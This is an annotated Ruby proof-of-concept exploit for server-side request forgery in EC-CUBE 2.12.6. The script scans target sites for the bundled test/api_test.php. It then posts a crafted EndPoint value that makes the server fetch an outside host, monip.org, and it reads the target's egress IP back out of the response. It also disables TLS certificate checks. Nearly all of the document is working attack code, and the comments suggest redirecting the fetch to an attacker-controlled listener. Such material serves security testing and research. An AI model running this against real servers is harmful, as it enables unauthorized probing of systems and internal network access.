
# Exploit Title: EC-CUBE 2.12.6 Server-Side Request Forgery
# Date: 22/10/16
# Exploit Author: Wad Deek
# Vendor Homepage: http://en.ec-cube.net/
# Software Link: http://en.ec-cube.net/download/
# Version: 2.12.6en-p1
# Tested on: XAMPP on Windows 7
# Language: Ruby (requires the mechanize gem)
# Fuzzing tool: https://github.com/Trouiller-David/PHP-Source-Code-Analysis-Tools
##
## Summary: the bundled test script test/api_test.php accepts an
## attacker-supplied "EndPoint" URL in a POST request and makes the EC-CUBE
## server fetch it, relaying the fetched content in its own response. This
## PoC points EndPoint at monip.org and reads the target's egress IP address
## back out of the relayed page, which proves the server-side request.
##
## Caveats: the scanner disables TLS certificate verification, and the PoC
## makes the *target* contact a third-party host (monip.org). For anything
## beyond a lab check, point EndPoint at a listener you control and adjust
## the IP-extraction regex accordingly.
##
#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
require('mechanize')

# HTTP client shared by every request issued below.
agent = Mechanize.new do |client|
  # Short timeouts so an unreachable host does not stall the whole scan.
  client.read_timeout = 3
  client.open_timeout = 3
  # One fresh TCP connection per request; HTTP redirects are followed.
  client.keep_alive = false
  client.redirect_ok = true
  # WARNING: certificate verification is switched off so HTTPS targets with
  # self-signed certificates can be probed. This leaves the scanner itself
  # open to MITM; do not reuse this configuration outside a lab tool.
  client.agent.http.verify_mode = OpenSSL::SSL::VERIFY_NONE
end
#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@

#===========================
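# Targets to probe, one base URL per line (trailing slash optional).
# Command-line arguments, when given, are used instead of this list.
urls = <<URLS
http://localhost/eccube/
URLS

# Path, relative to the EC-CUBE base URL, of the test script that performs
# the server-side fetch.
API_TEST_PATH = "test/api_test.php"

# Out-of-band oracle: the vulnerable script is told to fetch this URL, and
# monip.org echoes the address that contacted it, so the page relayed back
# through the target reveals the target's egress IP.
# The "?.jpg" suffix is presumably there to satisfy an extension check on
# the target side -- TODO confirm against the EC-CUBE source.
# NOTE: this makes the *target* talk to a third party; for a real engagement
# point it at a listener you control and adapt CALLBACK_IP_RE to match.
CALLBACK_URL = "http://www.monip.org/index.php" + "?.jpg"

# Pattern that pulls the echoed address out of monip.org's HTML.
CALLBACK_IP_RE = /IP : (.+?)</

# Fetches +target+ with +agent+ and returns [status_code, body].
#
# agent  - a Mechanize instance
# target - absolute URL string
#
# Network and HTTP errors (timeouts, connection refused, 4xx/5xx raised by
# Mechanize) are reported on stdout and turned into [nil, nil] so a single
# dead host does not abort the scan.
# Defined once, before the loop; the original PoC re-defined it on every
# iteration of the target loop.
def get(agent, target)
  response = agent.get(target)
  [response.code, response.body]
rescue StandardError => e
  puts("[-] " + target + " >>>> " + e.class.name + ": " + e.message)
  [nil, nil]
end

# Builds the POST body sent to test/api_test.php with +endpoint+ as the URL
# the server is coaxed into fetching. All other fields carry placeholder
# values as in the original PoC; which of them api_test.php actually
# requires has not been verified here. Insertion order matches the original.
#
# endpoint - URL string placed in the EndPoint field
def ssrf_params(endpoint)
  params = { "AccessKeyId" => 4111111111111111 }
  (0..9).each { |i| params["arg_key#{i}"] = 1 }
  (0..9).each { |i| params["arg_val#{i}"] = 1 }
  params.merge!(
    "EndPoint"  => endpoint,
    # NOTE(review): the original PoC sends this key literally as "mode="
    # (probably a typo for "mode"); kept verbatim because that is the form
    # that was tested against 2.12.6en-p1.
    "mode="     => "",
    "Operation" => 1,
    "SecretKey" => 1,
    "Service"   => 1,
    "Signature" => 1,
    "Timestamp" => 1,
    "type"      => "index.php"
  )
  params
end

targets = ARGV.empty? ? urls.split("\n") : ARGV
targets.map(&:strip).reject(&:empty?).each do |url|
  # Normalise the base URL so the script path is appended correctly.
  base = url.end_with?("/") ? url : url + "/"
  target = base + API_TEST_PATH

  # Step 1: confirm the test script is present and reachable.
  code, body = get(agent, target)
  next unless code == "200" && body.include?("EC-CUBE API TEST")

  # Step 2: ask it to fetch the callback URL and relay what it got.
  begin
    response = agent.post(target, ssrf_params(CALLBACK_URL))
  rescue StandardError => e
    puts("[-] " + target + " >>>> POST failed: " + e.class.name + ": " + e.message)
    next
  end

  ip = response.body.scan(CALLBACK_IP_RE).join
  if ip.empty?
    # The script answered, but nothing from the callback host came back:
    # the target may lack outbound access, or the page/regex has changed.
    # The original printed "[+]" here regardless, which is a false positive.
    puts("[?] " + target + " >>>> no callback data in response (status " + response.code.to_s + ")")
  else
    puts("[+] " + target + " >>>> monip.org >>>> " + ip)
  end
end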
#===========================